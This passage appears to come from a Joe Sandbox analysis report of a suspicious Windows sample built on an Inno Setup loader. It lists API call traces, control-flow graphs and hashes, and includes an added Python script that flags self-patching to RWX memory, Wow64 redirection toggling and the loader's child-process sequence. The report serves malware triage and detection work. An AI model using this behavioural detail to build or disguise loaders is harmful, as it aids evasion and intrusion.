                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                                      • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                                      • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                                      • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                      • API String ID: 1646373207-2130885113
                                                                                      • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                                      • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                                      • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                                      • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                                      • SetWindowLongA.USER32(00010474,000000FC,004097FC), ref: 0040A027
                                                                                        • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                                        • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
                                                                                        • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                                        • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                                      • 73A15CF0.USER32(00010474,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                      • API String ID: 978128352-3001827809
                                                                                      • Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                                      • Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
                                                                                      • Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                                      • Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02081638), ref: 00409484
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                                      • SetWindowLongA.USER32(00010474,000000FC,004097FC), ref: 0040A027
                                                                                        • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                                        • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
                                                                                        • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                                        • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                                        • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                                      • 73A15CF0.USER32(00010474,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                      • API String ID: 240127915-3001827809
                                                                                      • Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                                      • Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
                                                                                      • Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                                      • Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
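The APIs blocks above for 00409A14 (VirtualQuery walk from the image base followed by VirtualProtect with 00000040), 00408FE8 (Wow64 file-system-redirection exports looked up by name) and 0040A010 (the STATIC/InnoSetupLdrWindow window, SetWindowLongA subclass, child CreateProcessA, wait, exit code and RemoveDirectoryA) each describe a behaviour a triage script can key on. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses the report's "Name.MODULE(args), ref: address" annotation lines (the input is a constructed copy of lines from this page) and flags those three patterns. The rule names, the image-base default of 00400000 and the reading of the report's 000000FC as the sign-extended -4 immediate for GWL_WNDPROC are the example's own assumptions.

```python
"""Detection helpers run over Joe Sandbox 'APIs' annotation lines.

Added illustration for this report; not Joe Sandbox code and not part of the
sample. SAMPLE_LINES is a constructed copy of API lines from the report.
Patterns checked: the image's own pages switched to PAGE_EXECUTE_READWRITE,
run-time resolution of the Wow64 file-system-redirection toggles, and the
Inno Setup loader sequence (STATIC/InnoSetupLdrWindow window, GWL_WNDPROC
subclass, child CreateProcessA, wait, exit code, RemoveDirectoryA).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Union

PAGE_EXECUTE_READWRITE = 0x40
# GWL_WNDPROC is -4. The report prints the pushed byte immediate as 000000FC;
# accept that form and the full sign-extended 32-bit value (assumption).
GWL_WNDPROC_FORMS = {0xFC, 0xFFFFFFFC}

Arg = Union[int, str, None]

# Name.MODULE(arg,arg,...), ref: ADDRESS, optionally prefixed by a subcall note
LINE_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]{8}: )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

# Constructed sample: annotation lines copied from the APIs blocks of this report.
SAMPLE_LINES = """
GetSystemInfo.KERNEL32(?), ref: 00409A26
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00408FE8
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection), ref: 00409002
CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
SetWindowLongA.USER32(00010474,000000FC,004097FC), ref: 0040A027
  • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004098F8
  • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
  • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?), ref: 0040A113
"""


@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]
    ref: str


def _parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None                      # value not recovered by the sandbox
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)            # 32-bit stack/register value
    return token                         # string literal, e.g. kernel32.dll


def parse_api_lines(text: str) -> List[Call]:
    calls: List[Call] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()   # drop indentation and bullet
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [_parse_arg(a) for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return calls


def rwx_image_patching(calls: List[Call], image_base: int = 0x00400000) -> List[str]:
    """refs of VirtualProtect(..., PAGE_EXECUTE_READWRITE) issued once VirtualQuery has
    started walking from image_base: the process makes its own image pages RWX."""
    walked = False
    hits: List[str] = []
    for c in calls:
        if c.api == "VirtualQuery" and c.args and c.args[0] == image_base:
            walked = True
        if walked and c.api == "VirtualProtect" and len(c.args) >= 3 and c.args[2] == PAGE_EXECUTE_READWRITE:
            hits.append(c.ref)
    return hits


def wow64_redirection_toggle(calls: List[Call]) -> List[str]:
    """refs where a Wow64*FsRedirection export name is looked up at run time
    (the name is only visible because the import is resolved via GetProcAddress)."""
    names = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}
    return [c.ref for c in calls
            if c.api in ("GetModuleHandleA", "GetProcAddress")
            and any(isinstance(a, str) and a in names for a in c.args)]


def inno_loader_sequence(calls: List[Call]) -> Dict[str, bool]:
    """Which steps of the Inno Setup SetupLdr pattern are present."""
    def seen(api: str) -> bool:
        return any(c.api == api for c in calls)
    return {
        "ldr_window": any(c.api == "CreateWindowExA" and "STATIC" in c.args
                          and "InnoSetupLdrWindow" in c.args for c in calls),
        "wndproc_subclass": any(c.api == "SetWindowLongA" and len(c.args) >= 2
                                and c.args[1] in GWL_WNDPROC_FORMS for c in calls),
        "child_process": seen("CreateProcessA"),
        "waited_for_child": seen("MsgWaitForMultipleObjects") and seen("GetExitCodeProcess"),
        "temp_dir_removed": seen("RemoveDirectoryA"),
    }


def summarize(text: str) -> List[str]:
    """Human-readable findings for a set of API annotation lines."""
    calls = parse_api_lines(text)
    findings: List[str] = []
    for ref in rwx_image_patching(calls):
        findings.append(f"{ref}: VirtualProtect sets PAGE_EXECUTE_READWRITE on the process's own image")
    for ref in wow64_redirection_toggle(calls):
        findings.append(f"{ref}: Wow64 file-system redirection toggle resolved at run time")
    steps = inno_loader_sequence(calls)
    if steps["ldr_window"] and steps["child_process"]:
        findings.append("Inno Setup loader sequence: " + ", ".join(k for k, v in steps.items() if v))
    return findings


if __name__ == "__main__":
    for finding in summarize(SAMPLE_LINES):
        print(finding)
```

Only the first VirtualProtect at 00409A72 is reported: the second call at 00409AA4 carries "?" in the flNewProtect slot (the value restored from the earlier call's lpflOldProtect output is not recovered by the sandbox), so the rule deliberately fires only on an explicit 00000040. Feed it any function's APIs block from a report of this kind; lines that do not match the annotation shape are skipped.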

                                                                                      Control-flow Graph

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000,0040995B), ref: 004098F8
• CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974,00000000), ref: 0040990C
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
• GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
• CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02081638,00409974), ref: 00409940
  • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02081638), ref: 00409484
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
• String ID: D
• API String ID: 3356880605-2746444292
• Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
• Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
• Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
• Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Message
• String ID: $u@$.tmp
• API String ID: 2030045667-236237750
• Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
• Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
• Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
• Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD

Control-flow Graph

APIs
• MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Message
• String ID: $u@$.tmp
• API String ID: 2030045667-236237750
• Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
• Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
• Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
• Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD

Control-flow Graph

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
Strings
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
• Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
• Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
• Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5

Control-flow Graph

control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406F0A
• LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
• Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
• Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
• Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568

Control-flow Graph

control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
• GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
  • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
• Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
• Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
• Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6

Control-flow Graph

control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
APIs
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
• Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
• Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
• Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B

Control-flow Graph

control_flow_graph 326 407524-407545 SetFilePointer 327 407557-407559 326->327 328 407547-40754e GetLastError 326->328 328->327 329 407550-407552 call 4073ec 328->329 329->327
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
• GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
  • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020803AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
• Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
• Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
• Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766

Control-flow Graph

control_flow_graph 331 401430-40143d 332 401446-40144c 331->332 333 40143f-401444 331->333 334 401452-40146a VirtualAlloc 332->334 333->334 335 40146c-40147a call 4012e4 334->335 336 40148f-401492 334->336 335->336 339 40147c-40148d VirtualFree 335->339 339->336
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
• Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
• Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Control-flow Graph

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
  • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
  • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
Memory Dump Source
• Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
• Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
• Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
• Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmp
